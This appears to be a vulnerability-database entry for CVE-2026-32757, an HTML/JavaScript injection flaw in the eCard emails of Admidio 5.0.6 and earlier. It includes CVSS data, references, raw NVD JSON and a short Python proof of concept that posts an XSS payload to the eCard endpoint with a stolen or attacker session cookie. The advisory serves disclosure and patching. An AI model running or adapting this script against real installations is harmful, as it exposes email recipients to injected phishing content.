CVE-2026-32757

Description

Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the ecard_message field during form validation. An attack can result in any member or role receiving phishing content that appears legitimate, crossing from the web application into recipients' email clients. This issue has been fixed in version 5.0.7.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE

Admidio <= 5.0.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-32757
import requests

def exploit(target_url, session_cookie):
    headers = {
        "Cookie": session_cookie
    }
    # Malicious payload to be injected into the email body
    payload_data = {
        "ecard_message": "<img src=x onerror=alert('CVE-2026-32757')>",
        "ecard_recipients": "2", # ID of the victim user
        # Other required form fields omitted for brevity
    }
    
    # Sending the malicious eCard
    response = requests.post(f"{target_url}/adm_program/modules/ecards/ecards_function.php", data=payload_data, headers=headers)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check the victim's email.")
    else:
        print("[-] Failed to send payload.")

# Usage
# exploit("http://target-site.com", "PHPSESSID=attacker_session_id")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32757
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32757
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32757/
[4] VulDB https://vuldb.com/cve/CVE-2026-32757
[5] https://github.com/Admidio/admidio/releases/tag/v5.0.7
[6] https://github.com/Admidio/admidio/security/advisories/GHSA-4wr4-f2qf-x5wj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32757", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:16.930", "lastModified": "2026-03-23T16:52:29.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the ecard_message field during form validation. An attack can result in any member or role receiving phishing content that appears legitimate, crossing from the web application into recipients' email clients. This issue has been fixed in version 5.0.7."}, {"lang": "es", "value": "Admidio es una solución de gestión de usuarios de código abierto. En las versiones 5.0.6 e inferiores, el gestor de envío de eCard utiliza un valor $_POST['ecard_message'] sin procesar en lugar del $formValues['ecard_message'] saneado por HTMLPurifier al construir el HTML de la tarjeta de felicitación. Esto permite a un atacante autenticado inyectar HTML y JavaScript arbitrarios en correos electrónicos de tarjetas de felicitación enviados a otros miembros, eludiendo el saneamiento de HTMLPurifier del lado del servidor que se aplica correctamente al campo ecard_message durante la validación del formulario. Un ataque puede resultar en que cualquier miembro o rol reciba contenido de phishing que parezca legítimo, pasando de la aplicación web a los clientes de correo electrónico de los destinatarios. Este problema ha sido solucionado en la versión 5.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.7", "matchCriteriaId": "3347E657-D132-4D87-A355-391136657A27"}]}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-4wr4-f2qf-x5wj", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}